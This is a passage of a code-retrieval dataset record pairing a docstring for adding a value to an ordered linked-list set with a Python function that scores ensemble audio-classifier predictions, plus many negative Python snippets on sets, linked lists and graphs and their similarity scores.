triples_d[0][\"pred_text\"] == \"has_name\":\n # the set has a name; check to see if one with that name exists,\n # if so add to it, else create one with that name\n name = triples_d[0][\"obj_text\"]\n set_memids, _ = self.memory.basic_search(\n \"SELECT MEMORY FROM Set WHERE (has_name={} OR name={})\".format(name, name)\n )\n if not set_memids:\n # make a new set, and name it\n set_memid = SetNode.create(self.memory)\n self.memory.add_triple(subj=set_memid, pred_text=\"has_name\", obj_text=name)\n else:\n # FIXME, which one\n set_memid = set_memids[0]\n else:\n # an anonymous set, assuming its new, and defined to hold the triple(s)\n set_memid = SetNode.create(self.memory)\n for t in triples_d:\n self.memory.add_triple(\n 
subj=set_memid, pred_text=t[\"pred_text\"], obj_text=t[\"obj_text\"]\n )\n for r in ref_objs:\n self.memory.add_triple(subj=r.memid, pred_text=\"member_of\", obj=set_memid)\n\n # FIXME point to the objects put in the set, otherwise explain this better\n self.memory.dialogue_stack_append_new(Say, \"OK made those objects into a set \")\n return None, None", "def intersect(self, other):\n result = IntSet()\n map(result.insert, [e for e in self.vals if e in other.vals])\n return result", "def join(self):\n pass", "def sat_solve(self):\n # YOUR CODE HERE\n o = frozenset()\n if self.isfalse:\n return False\n elif self.istrue:\n return set()\n l = self.generate_candidate_assignments()\n print(\"assignments,\", l)\n for i in l:\n st = sat_apply_assignment(self, i)\n print(\"i:\", i, \"new set\", st)\n\n if st.istrue:\n return {i}\n elif not st.isfalse:\n sat_solve(st)\n\n return {i}", "def concat_all(self):\n return self.merge(1)", "def setOfBetas(self, free=True, fixed=False):\n s = set()\n for e in self.children:\n s = s.union(e.setOfBetas(free, fixed))\n return s", "def sets(set_id, set_name, series):\n if (set_id):\n format_set_info(find_set(set_id))\n else:\n params = build_up_set_params(set_name, series)\n print(params)\n param_list=''\n for k, v in params.items():\n param_list += (f'{k}:\"{v}\" ')\n param_list = param_list.strip()\n click.echo(param_list) \n sets = Set.where(q=param_list)\n for pset in sets:\n format_set_info(pset)", "def union(p,q):\n\tfor e in q:\n\t\tif e not in p:\n\t\t\tp.append(e)", "def construct(self):\n\n newSet = {}\n current_index = 0\n\n for key_1, value_1 in self._sets[self._currentSet].items():\n current_index += 1\n for key_2,value_2 in list(self._sets[self._currentSet].items())[current_index:]:\n # join the 2 tuples\n join = key_1 + key_2\n # remove duplicates\n join = tuple(set(join))\n # get combinations\n combined = tuple(combinations(join, self._currentSet+1))\n # sort combination\n combined = tuple(sorted(combined[0]))\n\n # append new combination to dict\n if len(combined) != 0 :\n newSet[combined] = 0\n\n self._currentSet += 1\n # append the new itemset in the sets dict \n self._sets[self._currentSet] = newSet", "def _aggregate_set_id_element_pairs(self, setpairs):\n set_ids = set([entry[0] for entry in setpairs])\n listlist = [[entry for entry in setpairs if entry[0] == set_id]\n for set_id in set_ids]\n result = [(pairlist[0][0], set([entry[1] for entry in pairlist]))\n for pairlist in listlist]\n return result" ]
[ "0.6154213", "0.60516834", "0.59407765", "0.58840305", "0.58840305", "0.582477", "0.57098496", "0.5630604", "0.5627058", "0.5624518", "0.5581384", "0.555813", "0.5543269", "0.5482053", "0.54482526", "0.544728", "0.54431444", "0.5377867", "0.5345894", "0.5336256", "0.5320816", "0.5284155", "0.5264651", "0.5228139", "0.52250856", "0.5206256", "0.5179389", "0.51730543", "0.5164909", "0.5140531", "0.5126629", "0.5103972", "0.5080006", "0.5077103", "0.5077024", "0.5074281", "0.50682825", "0.506433", "0.5062008", "0.50389147", "0.5029717", "0.50216854", "0.50166625", "0.5002637", "0.5001646", "0.5001594", "0.49987644", "0.49968064", "0.49940905", "0.4991014", "0.49808484", "0.497453", "0.49603334", "0.49592823", "0.49555734", "0.49547157", "0.4953333", "0.4948704", "0.49445522", "0.49352336", "0.49299052", "0.49277234", "0.49269614", "0.4924252", "0.49200314", "0.4919435", "0.49094024", "0.49093774", "0.4905977", "0.49052697", "0.48979932", "0.4895802", "0.48938304", "0.48905003", "0.48904538", "0.48749658", "0.48730734", "0.48679456", "0.48671395", "0.4865024", "0.48639864", "0.48630634", "0.4853432", "0.48522776", "0.48494798", "0.48455566", "0.48455465", "0.484123", "0.48379508", "0.48379508", "0.48328513", "0.4826688", "0.4826013", "0.48252118", "0.48242003", "0.48232663", "0.48183215", "0.48160008", "0.4810831", "0.48092774" ]
0.5403839
17
Add v to an ordered set s and return s. >>> s = Link(1, Link(3, Link(5))) >>> add(s, 0) Link(0, Link(1, Link(3, Link(5)))) >>> add(s, 4) Link(0, Link(1, Link(3, Link(4, Link(5))))) >>> add(s, 6) Link(0, Link(1, Link(3, Link(4, Link(5, Link(6)))))) >>> t = Link(1) >>> add(t, 0) Link(0, Link(1))
def add(s, v): if empty(s): return Link(v) head = s if head.first > v: # s = Link(v, s) # error: assignment, then s will rebind to a new object # s.first, s.rest = v, s # error s.rest = s s.first, s.rest = v, Link(s.first, s.rest) return s # head.first <= v while not empty(head.rest) and head.rest.first <= v: head = head.rest if head.first == v: return s else: head.rest = Link(v, head.rest) return s
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add(s, v):\n if empty(s):\n return Link(v)\n if s.first > v:\n s.first, s.rest = v, Link(s.first, s.rest)\n elif s.first < v and empty(s.rest):\n s.rest = Link(v, s.rest)\n elif s.first < v:\n add(s.rest, v)\n return s", "def add(self, s):\n current = self.first()\n # case 1 : list is empty, add new node as first node\n if self.size() == 0:\n self.__add_first(s)\n return\n # case 2 : list is not empty, element to be added is smaller than all existing ones\n elif s < current.value():\n self.__add_first(s)\n return\n # case 3 : list is not empty, element is larger than value of current element\n else:\n self.__length += 1\n nxt = current.next()\n # loop until we are at the end to find where to insert element\n while nxt is not None:\n if s < nxt.value():\n n = self.Node(s, nxt)\n current.set_next(n)\n return\n current = nxt\n nxt = nxt.next()\n current.set_next(self.Node(s, None))\n return", "def adjoin2(s, v):\n if empty(s) or s.first > v:\n return Link(v, s)\n elif s.first == v:\n return s\n else:\n return Link(s.first, adjoin2(s.rest, v))", "def add(self, s, value):\n\t\thead, tail = s[0], s[1:]\n\t\tcur_node = self.root[head]\n\t\tif not tail:\n\t\t\tcur_node.value = value\n\t\t\treturn # No further recursion\n\t\tcur_node.add(tail, value)", "def adjoin(s, v):\n if contains(s, v):\n return s\n else:\n return Link(v, s)", "def add_edge(self, u, v):\r\n keys = self.d.keys()\r\n #if nodes are not in graph, add them\r\n if u not in keys:\r\n self.add_node(u)\r\n if v not in keys:\r\n self.add_node(v)\r\n #add each node to the value set of each other\r\n u_old = self.d[u]\r\n u_new = u_old.union(set(str(v)))\r\n v_old = self.d[v]\r\n v_new = v_old.union(set(str(u)))\r\n self.d.update({u:u_new, v:v_new})", "def add_edge_directed(u, v):\n adj[u].append(v)", "def add_edge_directed(u, v):\n adj[u].append(v)", "def __add__(self, _v):\n\t\tif len(self) == len(_v):\n\t\t\tans = copy.deepcopy(self)\n\t\t\tfor i in range(0, self.n):\n\t\t\t\tans[i] += _v[i]\n\t\t\treturn ans", "def add(self,l,s=True):\r\n\t\t\t\t\r\n\t\t# make line\r\n\t\ts = self.copy()\r\n\t\tl = Li(l)\r\n\t\ta = Li._condense(l,s)\r\n\t\ta = Li(a,c=False)\r\n\t\t\t\r\n\t\t# sort?\r\n\t\tif s:\r\n\t\t\ta = a.sort()\r\n\t\t\t\r\n\t\treturn a", "def add(self, v):\n if v != \"?\":\n self.n += 1\n self.lo = min(v, self.lo)\n self.hi = max(v, self.hi)\n\n if len(self.has) < the[\"nums\"]:\n self.has.append(v)\n self.is_sorted = False\n\n elif random.random() < the[\"nums\"] / self.n:\n pos = random.randint(0, len(self.has) - 1)\n self.has[pos] = v\n self.is_sorted = False", "def addEdge(self,u,v):\r\n self.graph[u].append(v)", "def connect(self, u, v):\n self.e[u].add(v)\n self.e[v].add(u)", "def add_edge(u, v):\n adj[u].append(v)\n adj[v].append(u)", "def add_edge(u, v):\n adj[u].append(v)\n adj[v].append(u)", "def addVertex(self, v):\r\n self.adjacent.setdefault(v, list())", "def add_sortedsets(self, key, score, member):\n return self.redis.zadd(key, score, member)", "def add_elements_to_set(s: set, *args) -> set:\n s.update(set(*args))\n return s", "def add_edge(self, s, e):\n self.graph[s].append(e)", "def add_edge(self, u, v):\n self.graph[u].append(v)", "def add_this_many(x, el, s):\r\n count = 0\r\n for i in range(len(s)):\r\n if s[i] == x:\r\n count +=1\r\n while count > 0:\r\n s.append(el)\r\n count -= 1", "def union_add(this, that):\n return this.add(that, fill_value=0)", "def __add__(self, v):\n self.n += 1\n self.cnt[v] += 1\n tmp = self.cnt[v]\n if tmp > self.most:\n self.most = tmp\n self.mode = v\n return v", "def 
__addToLevel(self, head, value):\n\n #if DEBUG: print('\\t__addToLevel({})'.format(value))\n\n cur = head\n \n if cur.next == None:\n output = self.__insert(cur,value)\n return output\n \n #cur = cur.next\n\n while cur:\n if cur.next == None or \\\n cur.val == value or\\\n cur.next.val > value:\n output = self.__insert(cur,value)\n #output = cur\n break\n cur = cur.next\n return output", "def add(self, *items):\n for item in items:\n self.unsorted.append(item)\n key = item[0]\n self.index[key] = item\n return self", "def __add__(self,l):\r\n\t\t\r\n\t\t# add\r\n\t\ta = self.add(l)\r\n\t\t\r\n\t\treturn a", "def add(self, key, value):\n newest = self._Item(key, value) # make new item instance\n walk = self._data.last() # walk backward looking for smaller key\n while walk is not None and newest < walk.element():\n walk = self._data.before(walk)\n if walk is None:\n self._data.add_first(newest) # new key is smallest\n else:\n self._data.add_after(walk, newest) # newest goes after walk", "def addEdge(this, a, b):\n if not a in this.m:\n this.m[a]=set()\n this.m[a].add(b)", "def add(self, item):\n \n previous = None\n current = self.head\n \n while current is not None:\n if current.get_data() > item:\n break\n else:\n previous = current\n current = current.get_next()\n \n n = Node(item)\n # If node is to be added at the beginning (incl. case of empty list)\n if previous is None:\n n.set_next(self.head)\n self.head = n\n else:\n previous.set_next(n)\n n.set_next(current)", "def add(self, vertex):\n if not self.first:\n self.first = vertex\n self.first.next = vertex\n self.first.prev = vertex\n else:\n next = self.first\n prev = next.prev\n next.prev = vertex\n vertex.next = next\n vertex.prev = prev\n prev.next = vertex", "def add(self, i: int, v: int) -> None:\n while i < self.size:\n self.tree[i] += v\n i += self._lsb(i)", "def union2(s, t):\n if empty(s):\n return t\n elif empty(t):\n return s\n else:\n e1, e2 = s.first, t.first\n if e1 == e2:\n return Link(e1, union2(s.rest, t.rest))\n elif e1 < e2:\n return Link(e1, union2(s.rest, t))\n elif e2 < e1:\n return Link(e2, union2(s, t.rest))", "def add(self, value):", "def add(self, key, value):\n # If the node is empty, simply insert the key-value pair.\n if not self.keys:\n self.keys.append(key)\n self.values.append([value])\n return None\n\n for i, item in enumerate(self.keys):\n # If new key matches existing key, add to list of values.\n if key == item:\n self.values[i].append(value)\n break\n\n # If new key is smaller than existing key, insert new key to the left of existing key.\n elif key < item:\n self.keys = self.keys[:i] + [key] + self.keys[i:]\n self.values = self.values[:i] + [[value]] + self.values[i:]\n break\n\n # If new key is larger than all existing keys, insert new key to the right of all\n # existing keys.\n elif i + 1 == len(self.keys):\n self.keys.append(key)\n self.values.append([value])", "def add(self):\n a = self.pop()\n b = self.pop()\n c= a+b\n self.push(c)", "def __iadd__(self, value):\n self.store.append(value)\n return self", "def add_vertex(self, v):\n v = {'x': v[0], 'y': v[1]}\n if v not in self:\n self.append(v)\n return len(self)-1\n return self.index(v)", "def add_numbers(head1,head2):\n if not head2 and head1 :\n return head1\n elif not head1 and head2 :\n return head2\n elif not head1 and not head2 :\n return head2\n else :\n return reverse(add(reverse(head1),reverse(head2)))", "def insert(self, k: int, v: int) -> None:\n i = k % self.capacity\n if not self.data[i]:\n self.data[i] = ListNode(k, v)\n else:\n 
cur = self.data[i]\n while True:\n if cur.pair[0] == k:\n cur.pair = (k, v)\n return\n if not cur.next:\n break\n cur = cur.next\n cur.next = ListNode(k, v)", "def _propagate_add(self, u, v):\n\n new_ancestors = list(self.ancestors(u))\n new_ancestors.append(u)\n\n to_update = list(self.descendants(v))\n to_update.append(v)\n\n self.ancestor_matrix[np.ix_(to_update, new_ancestors)] = True", "def add(self, key, value):\r\n newest = Item(key, value) # make new item instance\r\n walk = self.data.last() # walk backward looking for smaller key\r\n while walk is not None and newest < walk.element():\r\n walk = self.data.before(walk)\r\n if walk is None:\r\n self.data.add_first(newest) # new key is smallest\r\n else:\r\n self.data.add_after(walk, newest) # newest goes after walk\r", "def add(self, item):\n \"\"\"\n :type item: Node()\n :rtype None\n \"\"\"\n node = Node(item)\n if self.head == None or self.head.getData() > node.getData():\n node.setNext(self.head)\n self.head = node\n return\n \n prev = self.head\n curr = self.head\n while curr:\n if curr.getData() > node.getData():\n prev.setNext(node)\n node.setNext(curr)\n return \n prev = curr\n curr = curr.getNext()\n \n # Add to the end\n prev.setNext(node)", "def plus(self, that):\n\t\tif(self.d != that.d):\n\t\t\traise ValueError(\"Vector lengths disagree\")\n\t\tc = SparseVector(self.d)\n\t\tfor i in self.st.keys():\n\t\t\tc.put(i, self.get(i))\n\t\tfor i in that.st.keys():\n\t\t\tc.put(i, that.get(i) + c.get(i))\n\t\treturn c", "def add(self, key, value):\n new = self._Item(key, value)\n\n if self.is_empty():\n self._data.append(new)\n else:\n for i, item in enumerate(self._data):\n if new <= item:\n self._data.insert(i, new)\n break\n if i == len(self) - 1:\n self._data.append(new)\n break", "def add(self, item):\n self.update(set([item]))", "def add(self,valor):\n\n MiNodo=Nodo(valor)\n if self.size==0: \n self.first=MiNodo\n else:\n current=self.first\n while current.next!=None:\n current=current.next \n current.next=MiNodo\n\n self.size+=1\n\n return MiNodo", "def __add__(self, other):\n if not isinstance(other, (list, Set)):\n raise TypeError(\"sets can only be joined with sets\")\n new_set = self._clone()\n for element in other:\n new_set._insert(element)\n return new_set", "def get_or_add(self, s):\n if s not in self.str2Id:\n self.id2Str[self.nextId] = s\n self.str2Id[s] = self.nextId\n self.id2freq[self.nextId] = 1\n self.nextId += 1\n else:\n self.id2freq[self.str2Id[s]] += 1\n return self.str2Id[s]", "def addInLink(source, target):\n if inlinkGraph.has_key(source):\n # if target not in inlinkGraph[source]:# uncomment to remove repetitives\n inlinkGraph[source].append(target)\n inlinkGraphDegree[source] = inlinkGraphDegree[source] + 1\n else:\n inlinkGraph[source].append(target)\n inlinkGraphDegree[source] = 1", "def addend_in_2(s):\n return head_of_list(plus, s)", "def __add__(self,other):\n self._obj['u'] += other._obj['u']\n self._obj['v'] += other._obj['v']\n return self._obj", "def add_item(self, key, item):\n self[key].add(item)\n try:\n self._reverse_store[item].add(key)\n except KeyError:\n self._reverse_store[item] = set([key])", "def add(self, c, result):\n cs = c[:]\n cs.sort()\n\n p = self\n for start in range(len(c)):\n if not p.tail.has_key(c[start]):\n p.tail[c[start]] = OutcomeCache()\n p = p.tail[c[start]]\n \n p.result = result", "def add(self, key: keyType, value: valueType) -> None:\n\n self.validate(key, value)\n hash_address = self.get_hash_address(key)\n head_node = self.hashTable[hash_address]\n\n # To 
uniform form of key\n uniform_key = key\n if isinstance(key, (list, set)):\n uniform_key = tuple(key)\n # else:\n # uniform_key = key\n # Create a new node and assign values.\n node_new = ChainNode()\n node_new.key = uniform_key\n node_new.values.append(value)\n\n # 'head_node.count == 0' means that there is no collision.\n if head_node.count == 0:\n head_node.singlyLinkedList.append(node_new)\n head_node.count = 1\n head_node.keys.append(uniform_key)\n else:\n # To deal with collision.\n if uniform_key not in head_node.keys:\n head_node.singlyLinkedList.append(node_new)\n head_node.keys.append(uniform_key)\n head_node.count = head_node.count + 1\n else:\n # For the same 'key', determine whether 'value' already exists. If not, then store.\n for index in range(len(head_node.singlyLinkedList)):\n if uniform_key == head_node.singlyLinkedList[index].key:\n if value not in head_node.singlyLinkedList[index].values:\n head_node.singlyLinkedList[index].values.append(value)\n head_node.count = head_node.count + 1\n break\n logger.info(\"Successfully add a new element.\")", "def __add__(self, other):\r\n return self.add(other)", "def add(self, item):\n if item in self:\n self._set(item, self._get(item) + 1)\n else:\n self._set(item, 1)", "def add(self, item):\n # must keep two pointers marching\n # in synch down the list.\n current = self._head\n previous = None\n while current != None:\n if current.getData() > item:\n # we’ve reached the insertion spot\n break\n else:\n # otherwise, advance both pointers\n previous = current\n current = current.getNext()\n temp = Node(item)\n if previous == None:\n # insert at the start of the list\n temp.setNext(self._head)\n self._head = temp\n else:\n temp.setNext(current)\n previous.setNext(temp)", "def addNode(l: ListNode, v: int) -> ListNode:\n node = ListNode(v)\n l.next = node\n return l", "def add(self, seq, diff):\n # Insert into sorted list using linear search because it will almost always be the front\n new = (seq, diff)\n for i, curr in enumerate(reversed(self.list)):\n if new > curr:\n self.list.insert(len(self.list) - i, new)\n break\n else:\n self.list.insert(0, new)", "def add(self, item):\n \n n = Node(item)\n n.set_next(self.head)\n self.head = n", "def __add__(self, other):\n return self.add(other)", "def add(self, aVal, bVal):\n if aVal in self._forwardMap:\n self._forwardMap[aVal].add(bVal)\n else:\n self._forwardMap[aVal] = set([bVal])\n\n if bVal in self._reverseMap:\n self._reverseMap[bVal].add(aVal)\n else:\n self._reverseMap[bVal] = set([aVal])\n\n return self", "def add_vectors(v, u):\n return (v[0] + u[0], v[1] + u[1])", "def __add__(self, other):\n if not other:\n return self.clone()\n else:\n return self.using(join(self, other))", "def __iadd__(self,l):\r\n\t\t\r\n\t\treturn self.add(l)", "def add(self, value):\n # Find the tail\n tail = self.head\n while tail and tail.next:\n tail = tail.next\n\n if tail:\n # Add a new node with the value\n tail.next = Node(value, tail, None)\n else:\n # Add first node to the list\n self.head = Node(value, None, None)", "def add(self, val):\n self.lookup[val] = self.lookup.get(val, 0) + 1", "def __setitem__(self,k,v):\n self.insert(k,v)", "def waysToAddTo(numbers, addTo):\n\tdef waysToAddToImpl(numbers, addTo, numsSoFar):\n\t\tfor n in numbers:#try adding each number\n\t\t\tnextList = numsSoFar + [n]\n\t\t\tsumn = sum(nextList)\n\t\t\tif sumn == addTo:\n\t\t\t\tyield nextList\n\t\t\telif sumn < addTo:\n\t\t\t\tlowerNumbers = [num for num in numbers if num <= n]#wlog, pieces decrease in size from 
first to last\n\t\t\t\tyield from waysToAddToImpl(lowerNumbers, addTo, nextList)\n\t\t\telse:#sumn > addTo:\n\t\t\t\tyield from []#there has to be a better way to do this\n\t\t\t\t\n\treturn waysToAddToImpl(numbers, addTo, [])", "def __add__(self, vector):\n return self.translated(vector)", "def add(self, item):\n if not (item in self.set):\n self.set[item] = True\n heapq.heappush(self.heap, item)", "def add_sets(self, key, member):\n return self.redis.sadd(key, member)", "def put(self, k: Any, v: Any):\n i = abs(hash(k)) % self.size\n current = self.data[i]\n while current is not None:\n if current.key == k:\n current.value = v\n return\n current = current.next\n new_node = self.Node(k, v)\n new_node.next = self.data[i]\n self.data[i] = new_node", "def add(element):", "def addNode(self, new_value): # Class O(n)\r\n if type(new_value) is not int: raise ValueError(\"Please, insert an integer\")\r\n h = self.head\r\n while 'next' in dir(h.next):\r\n h = h.next\r\n else:\r\n h.next = Node(new_value)", "def add(self, val):\n self[self.hash(val)] += 1", "def __add__(self, element):\r\n self.elements += element", "def addForDijkstra(self, idx):\n self.g += graph[self.visited[-1], self.not_visited[idx]]\n self.visited.append(self.not_visited.pop(idx))", "def __add__(self, other):\n\t\tself.__seqvector.vec += other.__seqvector.vec\n\t\treturn self", "def addAtHead(self, val: int) -> None:\n pred, succ = self.head, self.head.next\n cur = Node(val)\n cur.next = succ\n cur.prev = pred\n pred.next = cur\n succ.prev = cur\n self.size += 1\n # print(\"addHead\", self.head.next.val)", "def add(self, item):\n item = self._prepare_item(len(self), item)\n if item not in self._data:\n self._data.append(item)\n self.__log__.append(SetAdd(value=item))", "def add_edge(self, u: Hashable, v: Hashable, metadata: dict):\n # If u doesn't exist:\n if self.has_node(u):\n x = self._names.get_id(u)\n else:\n x = self.add_node(u, None)\n\n if self.has_node(v):\n y = self._names.get_id(v)\n else:\n y = self.add_node(v, None)\n\n # Insert metadata for this edge, replacing the previous metadata:\n self._meta.add_edge(u, v, metadata)\n\n # TODO: Support multigraphs, and allow duplicate edges.\n if self.has_edge(u, v):\n return\n return self._nk_graph.addEdge(x, y)", "def __add__(self, other: t.Any) -> InspectableSet[_C]:\n return self._op_copy('__add__', other)", "def add(self, item):\n node = Node(item)\n node.next = self.head\n self.head = node", "def add_sorted(self, val):\n if self.root is None:\n self.root = TreeNode(val)\n else:\n self._add_sorted(val, self.root)", "def add_edge(self, u: str, v: str) -> None:\n if (u == v):\n return\n else:\n # add_vertex handles the checks\n # for if the vertices already\n # exist and if they already do,\n # nothing happens. 
Else it adds them\n self.add_vertex(u)\n self.add_vertex(v)\n\n # check if the edge already exists\n if self.contains_edge(u, v):\n return\n\n # create the edge\n self.adj_list[u].append(v)\n self.adj_list[v].append(u)", "def add(self, d):\n new_node = Node(d)\n self.root = new_node\n self.size += 1\n return d", "def append(self, value):\n if not self.head:\n self.head = Node(value)\n return\n link = self.head\n while link.next_value:\n link = link.next_value\n link.next_value = Node(value)\n return", "def __add__(self, this):\n return self.add(this)", "def __iadd__(self, other):\n self.append(other)\n return self", "def add(self, k, v):\n values = super(OrderedMultiDict, self).setdefault(k, [])\n self._insert(k, v)\n values.append(v)", "def extend_link(s, t):\n assert is_link(s) and is_link(t)\n if s == empty:\n return t\n else:\n return link(first(s), extend_link(rest(s), t))", "def extend_link(s, t):\n assert is_link(s) and is_link(t)\n if s == empty:\n return t\n else:\n return link(first(s), extend_link(rest(s), t))", "def sorted_insert(self, value):\n new = Node(value)\n if self.__head is None:\n self.__head = new\n return\n\n cur = self.__head\n if new.data < cur.data:\n new.next_node = self.__head\n self.__head = new\n return\n\n while (cur.next_node is not None) and (new.data > cur.next_node.data):\n cur = cur.next_node\n\n new.next_node = cur.next_node\n cur.next_node = new\n return", "def add_vertex(self, v: str) -> None:\n if self.contains_vertex(v):\n return\n else:\n self.adj_list[v] = []", "def addAtIndex(self, index, val):\n if index < 0:\n return -1\n\n p = self.head\n while index and p: # 0-index before index-th\n p = p.next\n index -= 1\n\n if p == None:\n return\n cur = linkNode(val)\n cur.next = p.next\n cur.prev = p\n if p.next:\n p.next.prev = cur\n p.next = cur\n if cur.next == None: # tail\n self.tail = cur\n # self.printList()", "def add(self, data):\n node = Node(data)\n if self.head == None:\n self.head = node\n\n else:\n traverse = self.head\n if self.head.data > node.data:\n self.head = node\n node.next = traverse\n\n if self.head.data < node.data:\n temp = self.head\n while traverse.next != None:\n if traverse.data < node.data:\n temp = traverse\n traverse = traverse.next\n\n if traverse.data < node.data:\n temp = traverse\n\n temp1 = temp.next\n temp.next = node\n node.next = temp1", "def __add__(self, other: Seq) -> Seq:\n new_sequence = self.sequence + other.sequence\n return Seq(new_sequence, self.id)", "def add(self, key, value):\n token = self.Locator(key, value, len(self._data)) # initiaize locator index\n self._data.append(token)\n self._upheap(len(self._data) - 1)\n return token", "def add(self, key, value):\n token = self.Locator(key, value, len(self._data)) # initiaize locator index\n self._data.append(token)\n self._upheap(len(self._data) - 1)\n return token" ]
[ "0.7793301", "0.6587982", "0.6429319", "0.6309428", "0.61591506", "0.60639244", "0.5989767", "0.5989767", "0.58004624", "0.5777832", "0.5752884", "0.56904775", "0.56822777", "0.56809616", "0.56809616", "0.56750697", "0.5661514", "0.56589", "0.561813", "0.5617699", "0.55932224", "0.55590105", "0.5557789", "0.55549157", "0.5538273", "0.55347526", "0.54973215", "0.5493604", "0.5422333", "0.53962153", "0.5391316", "0.5388189", "0.5363055", "0.5355532", "0.5353231", "0.5330188", "0.53139657", "0.5308398", "0.5304417", "0.5303323", "0.53032196", "0.52860385", "0.5274463", "0.5273746", "0.5269769", "0.52682304", "0.5257173", "0.52490044", "0.5244267", "0.5243065", "0.5239326", "0.52245873", "0.52083606", "0.5189934", "0.5189706", "0.5182499", "0.51812136", "0.51654196", "0.51623887", "0.51518285", "0.5147442", "0.5145601", "0.5144839", "0.5139065", "0.51264006", "0.5124947", "0.5115498", "0.5111821", "0.51086307", "0.5108088", "0.5104437", "0.5104032", "0.5100321", "0.50978714", "0.5087312", "0.5085696", "0.50782603", "0.50751495", "0.506906", "0.5067832", "0.50604254", "0.5058021", "0.5042322", "0.5040987", "0.5038629", "0.50268555", "0.5025204", "0.5019058", "0.5009529", "0.49994346", "0.49900785", "0.49833253", "0.49833253", "0.49687025", "0.49683183", "0.49665627", "0.49622712", "0.4960742", "0.49525312", "0.49525312" ]
0.7641497
1
Tests models trained on segmented logmel spectrograms.
def test_wind_mel_model(preds_paths, data_val): # Load model predicitions - allowing for possibility of ensemble model_preds = np.stack([np.load(pred_path) for pred_path in preds_paths]) model_preds = np.mean(model_preds, axis=0) # Get ids and true labels labels = [] ids = [] for example in data_val: labels.append(example[1]) ids.append(example[2]) # Calculate accuracy and label-predication pairs num_examples = 0 num_correct = 0 current_id = None current_label = None c_matrix = np.zeros((50, 50)) for i in range(len(ids)): label = labels[i] id = ids[i] # Check to see if new example has entered if id != current_id: # Evaluate previous id fully - will not enter on first iteration if current_id: current_prediction_probs /= num_ids prediction = np.argmax(current_prediction_probs) # update lab_pred counts c_matrix[int(current_label), int(prediction)] += 1 # Increment correct prediction counter if prediction correct if prediction == current_label: num_correct += 1 # reset and increment variables num_examples += 1 current_id = id current_label = label num_ids = 1 current_prediction_probs = model_preds[i] else: num_ids += 1 current_prediction_probs += model_preds[i] accuracy = num_correct / num_examples print(f"{num_correct} / {num_examples} = {accuracy:.4f}") return accuracy, c_matrix
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_models(directorio=''):\r\n \r\n print('The trained models will be tested now')\r\n start = time.time()\r\n \r\n busqueda = \"ls \" + directorio + \"/*.h5 > model_names.txt\"\r\n\r\n os.system(busqueda)\r\n\r\n X = np.load(directorio + '/Xtest.npy')\r\n diccio = np.load(directorio + '/feature_standarisation.npy').item()\r\n y = pd.read_csv(directorio + '/dbtest.csv')['target'].values\r\n\r\n X = (X - diccio['mean'])/diccio['std']\r\n x = np.reshape(X,(X.shape[0],X.shape[2]))\r\n \r\n with open('model_names.txt','r') as f:\r\n for line in f:\r\n modelo = models.load_model(line[:len(line)-1])\r\n nombre = line.split('/')[1]\r\n outpred = modelo.predict(x)\r\n prediction = outpred >= 0.5\r\n \r\n cost = -(np.dot(y,np.log10(outpred)) + \\\r\n np.dot((1-y),np.log10(1-outpred)))/y.shape[0]\r\n precision,recall,fscore,support = PRFS(y, prediction)\r\n \r\n with open(directorio + '/test_results.txt','a') as tr:\r\n tr.write(nombre + '\\n')\r\n tr.write('cost function: '+str(cost[0])+'\\n')\r\n tr.write('samples: '+str(support)+'\\n')\r\n tr.write('precision: '+str(np.round(precision*100,2))+'\\n')\r\n tr.write('recall: '+str(np.round(recall*100,2))+'\\n')\r\n tr.write('f1-score: '+str(np.round(fscore*100,2))+'\\n')\r\n tr.write('\\n')\r\n tr.close()\r\n \r\n print('The test of all trained models lasted ', round(time.time()-start,2),' s')\r\n os.system('rm model_names.txt')\r\n \r\n return", "def test():\r\n le = preprocessing.LabelEncoder()\r\n le.fit([\"Door Knocking\",\"Shower Running\",\"Toilet Flushing\",\"Vacuum Cleaning\",\"Keyboard Typing\", # encode class labels as numeric id values\r\n \"Coughing\",\"Neutral\"])\r\n \r\n if torch.cuda.is_available():\r\n device = \"cuda:0\"\r\n use_cuda = True\r\n else:\r\n device = \"cpu\"\r\n use_cuda = False\r\n \r\n myModel, start_epoch, train_hist = loadCheckpoint(31, use_cuda)\r\n \r\n #myModel = myModel.double()\r\n myModel = myModel.to(device, dtype=torch.double)\r\n next(myModel.parameters()).device # Check that it is on Cuda\r\n \r\n file_names = []\r\n class_ids = []\r\n max_s = 1\r\n sr = 44100 \r\n for entry in os.scandir(\"test wavs/\"): # for each folder corresponding to a class in dataset\r\n class_id = entry.name # get class numeric id according to label encoder\r\n relative_path = \"test wavs/\"+entry.name # get path location of data sample for loading audio\r\n file_names.append(relative_path) # append to list\r\n class_ids.append(class_id)\r\n\r\n max_s = 1\r\n sr = 44100\r\n X_test = [] \r\n for i in range(len(file_names)):\r\n audio = LoadAudio.load(file_names[i]) # load audio file\r\n audio = LoadAudio.resample(audio, sr) # resample audio\r\n audio = LoadAudio.mono(audio) # make audio stereo\r\n audio = LoadAudio.resize(audio, max_s) # resize audio \r\n sgram = LoadAudio.spectrogram(audio, n_mels=128, n_fft=1024, hop_len=None) # create spectrogram \r\n sgram = LoadAudio.hpssSpectrograms(audio,sgram)\r\n sgram_tensor = torch.tensor(sgram)\r\n X_test.append(sgram_tensor)\r\n\r\n pred = np.array([])\r\n for i in range(len(X_test)):\r\n inputs = X_test[i]\r\n # Normalize the inputs\r\n inputs_m, inputs_s = inputs.mean(), inputs.std()\r\n inputs = (inputs - inputs_m) / inputs_s\r\n inputs = inputs.unsqueeze(0)\r\n inputs = inputs.double()\r\n \r\n # Get predictions\r\n outputs = myModel(inputs)\r\n\r\n # Get the predicted class with the highest score\r\n _, predicted = torch.max(outputs.data, 1)\r\n \r\n pred = np.append(pred, le.inverse_transform(predicted.detach().cpu().numpy()))\r\n \r\n\r\n df = pd.DataFrame(pred, 
